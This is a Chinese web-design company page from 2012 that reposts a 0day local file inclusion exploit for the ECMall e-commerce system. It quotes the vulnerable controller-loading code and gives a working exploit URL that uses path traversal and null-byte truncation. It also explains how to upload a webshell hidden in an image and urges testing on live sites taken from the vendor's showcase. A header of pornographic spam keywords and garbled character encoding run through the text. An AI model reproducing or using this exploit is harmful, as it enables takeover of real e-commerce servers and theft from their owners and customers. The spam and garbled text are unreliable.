日韩av爽爽爽久久久久久,嫩草av久久伊人妇女超级a,久久精品a亚洲国产v高清不卡,久久成人国产精品一区二区

知識學(xué)堂
  • ·聯(lián)系電話:+86.023-75585550
  • ·聯(lián)系傳真:+86.023-75585550
  • ·24小時手機(jī):13896886023
  • ·QQ 咨 詢:361652718 513960520
當(dāng)前位置 > 首頁 > 知識學(xué)堂 > 網(wǎng)站建設(shè)知識
ecmall本地文包函(0day)
更新時間:2012-05-21 | 發(fā)布人:本站 | 點(diǎn)擊率:380
ECMall 社區(qū)電子商務(wù)系統(tǒng)(簡稱ECMall)是上海商派網(wǎng)絡(luò)科技有限公司繼ECShop 之后推出的又一個電子商務(wù)姊妹產(chǎn)品。
 
最近看到烏云上暴了一個ecmall全版文件包函漏洞、其實(shí)自己早在去年做ecmall二次開發(fā)的時候也發(fā)現(xiàn)了一個本地文件包函漏洞和xss、不知道和烏云上的哪個是不是一樣。
 
出現(xiàn)的地方比較杯具,是一個核心文件里面、在eccore/ecmall.php文件里。大概78行左右吧。
 
 
 
//只判斷是app是否設(shè)置,然后去掉了兩端空格
 
$app = isset($_REQUEST['app']) ? trim($_REQUEST['app']) : $default_app;
 
$act = isset($_REQUEST['act']) ? trim($_REQUEST['act']) : $default_act;
 
//很明顯可以看出$app是我們可以控制的、由于后面連接了.app.php所以利用的時候要截?cái)唷?/DIV>
 
$app_file = $config['app_root'] . "/{$app}.app.php";
 
//應(yīng)為是本地包函、所以is_file是為真的
 
if (!is_file($app_file))
 
{
 
exit('Missing controller');
 
}
 
//這里直接就包函了,這么底級的漏洞、我都不好說什么了.
 
require($app_file);
 
 
 
Exp:http://xxxx.com/index.php?app=../data/files/mall/application/store_516_1.jpg%00.
 
 
 
測試:
 
到官方的用戶展示里挑幾個目標(biāo)測試一下。
 
注冊一個用戶、上傳頭像或者其他上傳地方上傳一張函一句話的圖片、包函進(jìn)來即可.
 
將圖片路徑替換exp里的路徑、后面的%00.就是前面所說的截?cái)?0后面有個點(diǎn)看清楚.
 
 
 
注:須要在GPC沒打開時方能利用成功、所以說還是有一點(diǎn)雞肋的,不要用來做壞事、產(chǎn)生任何后果與本人無關(guān)。
 
 
 
其他地方還有很多xss、用xss來拿shell的成功率要高很多、因?yàn)楹笈_可以拿shell。匆忙亂寫的比較亂呀、見笑鳥,有機(jī)會寫個其他類型的。